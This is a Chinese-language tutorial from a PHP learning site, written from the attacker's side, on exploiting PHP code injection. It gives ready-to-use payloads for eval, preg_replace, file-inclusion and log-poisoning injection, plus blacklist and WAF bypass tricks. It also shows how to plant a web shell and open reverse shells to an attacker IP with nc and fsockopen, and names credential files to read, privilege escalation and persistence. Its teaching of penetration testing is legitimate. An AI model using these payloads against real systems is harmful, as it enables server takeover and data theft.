PHP代码注入如何利用_PHP代码注入漏洞利用方法详解-php教程-PHP中文网

答案：PHP代码注入是因用户输入未严格过滤，导致恶意代码被执行的漏洞，常见于eval()、preg_replace()、文件包含等场景。攻击者可通过构造payload绕过过滤，执行系统命令或写入Web Shell，最终获取服务器控制权并进行提权、数据窃取和横向移动。

php代码注入如何利用_php代码注入漏洞利用方法详解

PHP代码注入，简单来说，就是攻击者通过向Web应用程序的输入点提交恶意的PHP代码，利用应用程序对这些输入处理不当，最终导致服务器执行这些恶意代码的一种漏洞。它的核心在于应用程序没有正确地过滤、验证或转义用户输入，使得本应是数据的内容被当作代码来解析和执行。一旦成功利用，攻击者几乎可以完全控制受影响的服务器，从读取敏感文件到安装后门，乃至接管整个系统。

解决方案

PHP代码注入的利用方式多种多样，其本质都是找到应用程序中将用户可控数据当作PHP代码执行的函数或上下文。最直接的利用场景是当用户输入直接传递给

eval()

登录后复制

函数时。例如，如果代码中存在

eval($_GET['code']);

登录后复制

这样的结构，攻击者只需通过URL参数

?code=phpinfo();

登录后复制

就能执行

phpinfo()

登录后复制

，或者

?code=system('ls -la');

登录后复制

来执行系统命令。

然而，现实中的情况往往更隐蔽。

preg_replace()

登录后复制

函数在PHP 5.5.0版本之前，如果使用了

/e

登录后复制

修饰符，其替换字符串会被当作PHP代码执行。例如，

preg_replace('/.*/e', $_GET['inject'], 'subject');

登录后复制

，攻击者可以通过

?inject=phpinfo()

登录后复制

来触发。

另一种常见的路径是文件包含漏洞（LFI）与代码注入的结合。当应用程序使用

include()

登录后复制

或

require()

登录后复制

加载用户指定的文件，且对文件路径没有严格限制时，攻击者可以尝试包含包含恶意PHP代码的文件。这可能包括：

立即学习“PHP免费学习笔记（深入）”；

日志文件注入： 许多Web服务器会将用户请求头（如User-Agent）写入日志。攻击者可以在User-Agent中注入
```
<?php system($_GET['cmd']); ?>
```
登录后复制
等代码，然后通过LFI漏洞包含Web服务器的日志文件（如
```
/var/log/apache2/access.log
```
登录后复制
），从而执行任意代码。
data://
登录后复制
或
php://filter
登录后复制
伪协议：攻击者可以直接在URL中构造包含PHP代码的
```
data://text/plain,<?php system('id'); ?>
```
登录后复制
，如果
```
include()
```
登录后复制
函数没有对协议进行过滤，这段代码就会被执行。
```
php://input
```
登录后复制
也可以用于类似目的，但需要通过POST请求发送代码。

更复杂一些的是PHP对象注入（Deserialization Vulnerability）。当应用程序对用户可控的序列化字符串进行

unserialize()

登录后复制

操作时，如果应用程序中存在定义了"魔术方法"（如

__wakeup()

登录后复制

__destruct()

登录后复制

__toString()

登录后复制

等）的类，攻击者可以构造一个恶意的序列化对象，在反序列化过程中触发这些魔术方法，进而执行任意代码。这通常需要结合特定的"gadget chain"才能实现。

此外，一些命令执行函数（如

system()

登录后复制

exec()

登录后复制

shell_exec()

登录后复制

passthru()

登录后复制

等）虽然不是直接执行PHP代码，但它们通常是代码注入的终极目标。如果用户输入直接或间接地拼接到这些函数的参数中，攻击者可以通过注入命令分隔符（如

登录后复制

&&

登录后复制

||

登录后复制

）来执行任意系统命令。例如，

system("ls " . $_GET['dir']);

登录后复制

可以通过

?dir=; id

登录后复制

来执行

id

登录后复制

命令。

识别潜在的PHP代码注入点：不仅仅是

eval()

登录后复制

要找到PHP代码注入点，我们不能只盯着

eval()

登录后复制

，那太局限了。一个真实的应用，漏洞往往藏在不那么显眼的地方。最直接的方法当然是代码审计，仔细审查所有涉及用户输入处理的代码段。我会特别关注那些将用户输入作为参数传递给以下函数的：

```
eval()
```
登录后复制
：这是最明显的，直接执行字符串作为PHP代码。
```
preg_replace()
```
登录后复制
：特别是带有
```
/e
```
登录后复制
修饰符的版本，虽然现在PHP版本大多已弃用，但老旧系统仍可能存在。
```
include()
```
登录后复制
,
```
require()
```
登录后复制
,
```
include_once()
```
登录后复制
,
```
require_once()
```
登录后复制
：这些函数如果路径可控，可能导致LFI进而代码执行。
```
unserialize()
```
登录后复制
：反序列化漏洞是高级代码注入的一种，需要深入理解PHP对象的生命周期。
```
create_function()
```
登录后复制
：这个函数本身可以动态创建匿名函数，如果其参数可控，也是一个注入点。
```
assert()
```
登录后复制
：与
```
eval()
```
登录后复制
类似，它将字符串作为PHP代码执行。
```
call_user_func()
```
登录后复制
,
```
call_user_func_array()
```
登录后复制
：如果函数名和参数都可控，可能被滥用。
```
system()
```
登录后复制
,
```
exec()
```
登录后复制
,
```
shell_exec()
```
登录后复制
,
```
passthru()
```
登录后复制
,
```
popen()
```
登录后复制
,
```
proc_open()
```
登录后复制
：这些是系统命令执行函数，虽然不是PHP代码注入本身，但经常是代码注入的最终目标或间接利用路径。

除了代码审计，动态测试也必不可少。我会使用各种渗透测试工具或手动构造请求，对所有可能的输入点（GET参数、POST数据、HTTP头、Cookie等）进行模糊测试（fuzzing）。尝试注入简单的PHP代码片段（如

<?php phpinfo(); ?>

登录后复制

、

system('id');

登录后复制

）或命令分隔符，观察应用程序的响应和服务器日志。有时候，详细的错误信息会不经意间泄露后端处理逻辑，比如某个函数调用栈，这能为我们提供宝贵的线索。另外，观察HTTP响应头，例如

X-Powered-By: PHP/X.Y.Z

登录后复制

可以帮助我们判断PHP版本，从而推断可能存在的特定版本漏洞。

绕过常见的过滤与防御机制

在实际的渗透测试中，直接注入

system('id');

登录后复制

这样的代码往往会遇到各种过滤和防御机制，比如WAF（Web Application Firewall）或应用层面的输入净化。绕过这些机制，需要一些技巧和创造性思维。

代码小浣熊

代码小浣熊是基于商汤大语言模型的软件智能研发助手，覆盖软件需求分析、架构设计、代码编写、软件测试等环节

查看详情

首先，黑名单过滤是最常见的，它会阻止一些危险的函数名或关键字。应对这种过滤，我们可以尝试：

大小写混淆： 例如，
```
system('id');
```
登录后复制
或
```
pHpInfo();
```
登录后复制
。
字符串拼接： 如果
```
system
```
登录后复制
被过滤，可以尝试
```
'sy'.'stem'('id');
```
登录后复制
。
编码： URL编码、Base64编码甚至十六进制编码，例如
```
eval(base64_decode('cGhwaW5mbygpOw=='));
```
登录后复制
。但需要注意，目标函数必须能解码这些字符串。
使用替代函数： 如果
```
system()
```
登录后复制
被禁，可以尝试
```
passthru()
```
登录后复制
、
```
shell_exec()
```
登录后复制
、
```
exec()
```
登录后复制
等功能相似的函数。
利用PHP的弱类型特性： 有时可以通过类型转换或比较的漏洞来绕过。
反引号执行命令： 在PHP中，反引号
```
`
```
登录后复制
内的内容会被当作shell命令执行，例如
```
`id`
```
登录后复制
。

其次，WAF通常基于规则集进行检测，它们可能会拦截包含特定模式的请求。绕过WAF则需要更灵活的策略：

HTTP参数污染（HPP）： 如果WAF只检查第一个同名参数，我们可以发送
```
?cmd=id&cmd=;
```
登录后复制
，期望后端处理时将两个
```
cmd
```
登录后复制
参数合并。
请求方法变换： 尝试将GET请求改为POST，或者反之，看WAF是否对所有方法都进行同等强度的检测。
编码变体： 尝试双重URL编码、Unicode编码或其他不常见的编码方式，可能会绕过WAF的正则匹配。
利用注释、换行符和制表符： 在payload中插入
```
/* */
```
登录后复制
注释、
```
%0a
```
登录后复制
（换行符）或
```
%09
```
登录后复制
（制表符），有时可以打乱WAF的匹配模式。
非标准HTTP头： 有些WAF规则可能只关注请求体或URL，而忽略某些HTTP头。
分块传输编码： 尝试使用
```
Transfer-Encoding: chunked
```
登录后复制
来发送请求，有时可以规避WAF对完整请求体的检测。
利用WAF自身的解析差异： 某些WAF在解析HTTP请求时可能与Web服务器存在差异，导致WAF认为请求是无害的，而Web服务器则正常解析并执行恶意代码。

最后，白名单过滤是最难绕过的，因为它只允许特定的安全字符或模式。在这种情况下，我们可能需要寻找逻辑漏洞，或者尝试利用白名单允许的字符来构造一个合法的、但能导致非预期行为的payload。这通常需要对应用程序的业务逻辑和代码实现有更深入的理解。

进一步的利用：从代码注入到服务器控制

成功注入PHP代码仅仅是开始，真正的目标往往是获取对目标服务器的完全控制权。一旦我们能够执行任意PHP代码，接下来的一系列操作就变得顺理成章。

最常见的下一步是上传一个Web Shell。一个简单的Web Shell可能只是

<?php system($_GET['cmd']); ?>

登录后复制

，将其写入一个可访问的文件（如

shell.php

登录后复制

），然后我们就可以通过访问

shell.php?cmd=ls -la

登录后复制

来执行任意系统命令。更高级的Web Shell（如China Chopper、Weevely等）则提供文件管理、数据库管理、端口扫描等多种功能，极大地便利了后续操作。通常，我们会利用

file_put_contents()

登录后复制

或

fwrite()

登录后复制

等PHP函数将Web Shell的内容写入服务器上的某个目录。

如果条件允许，获取一个反向Shell（Reverse Shell）会提供一个更稳定、更交互式的控制通道。反向Shell意味着目标服务器主动连接到攻击者的机器，建立一个命令行会话。这通常通过执行以下PHP代码来实现：

利用
```
system()
```
登录后复制
或
```
exec()
```
登录后复制
执行
```
nc
```
登录后复制
命令：
```
system('nc -e /bin/sh <攻击者IP> <端口>');
```
登录后复制
（注意，
```
nc -e
```
登录后复制
在某些系统上可能不可用或被禁用）。
利用PHP自身的socket函数：
```
$sock=fsockopen("<攻击者IP>",<端口>);exec("/bin/sh -i <&3 >&3 2>&3");
```
登录后复制
这段代码会创建一个socket连接，并将
```
/bin/sh
```
登录后复制
的输入、输出、错误流重定向到这个socket。

获得Shell之后，我们就可以进行数据窃取，读取服务器上的敏感文件，例如：

```
/etc/passwd
```
登录后复制
或
```
/etc/shadow
```
登录后复制
：获取用户账户信息。
数据库配置文件：如
```
config.php
```
登录后复制
，获取数据库连接凭据。
应用程序源代码：分析更多漏洞，或获取敏感业务逻辑。
其他敏感数据：如用户上传的文件、临时文件等。

权限提升也是一个关键环节。Web服务器通常以低权限用户运行（如

www-data

登录后复制

），为了获得更高的权限（如root），攻击者会尝试：

查找SUID或SGID文件： 这些文件以文件所有者或组的权限运行，可能存在漏洞。
内核漏洞： 利用操作系统内核的已知漏洞进行提权。
错误配置： 例如，
```
sudo -l
```
登录后复制
命令可能显示当前用户可以无需密码执行某些高权限命令。

最后，为了保持持久性和横向移动，攻击者可能会在服务器上留下后门，修改启动脚本，或者利用当前服务器作为跳板，扫描和攻击内网中的其他机器。这些操作都是为了确保即使Web Shell被清除，也能重新获得对服务器的控制，并扩大攻击范围。整个过程是一个步步为营的链条，每一步的成功都为下一步的深入利用奠定基础。

以上就是PHP代码注入如何利用_PHP代码注入漏洞利用方法详解的详细内容，更多请关注php中文网其它相关文章！